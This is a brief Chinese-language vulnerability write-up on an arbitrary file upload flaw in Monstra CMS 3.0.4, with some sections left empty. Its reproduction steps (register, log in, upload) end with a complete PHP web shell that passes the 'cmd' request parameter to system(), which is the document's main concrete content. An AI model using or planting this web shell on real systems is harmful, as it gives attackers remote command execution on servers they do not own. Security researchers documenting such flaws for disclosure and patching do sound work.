Monstra存在任意文件上传漏洞
一、漏洞简介
<font style="color:rgba(0, 0, 0, 0.84);">Monstra 是一个现代化的轻量级内容管理系统。它易于安装、升级和使用。Monstra CMS 3.0.4版本中存在着一处安全漏洞,该漏洞源于程序没有正确验证文件扩展名。攻击者可以上传特殊后缀的文件执行任意PHP代码。</font>
<font style="color:rgba(0, 0, 0, 0.84);">二、影响版本</font>
- Monstra
三、资产测绘
四、漏洞复现
注册账号后登录后台
上传文件
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>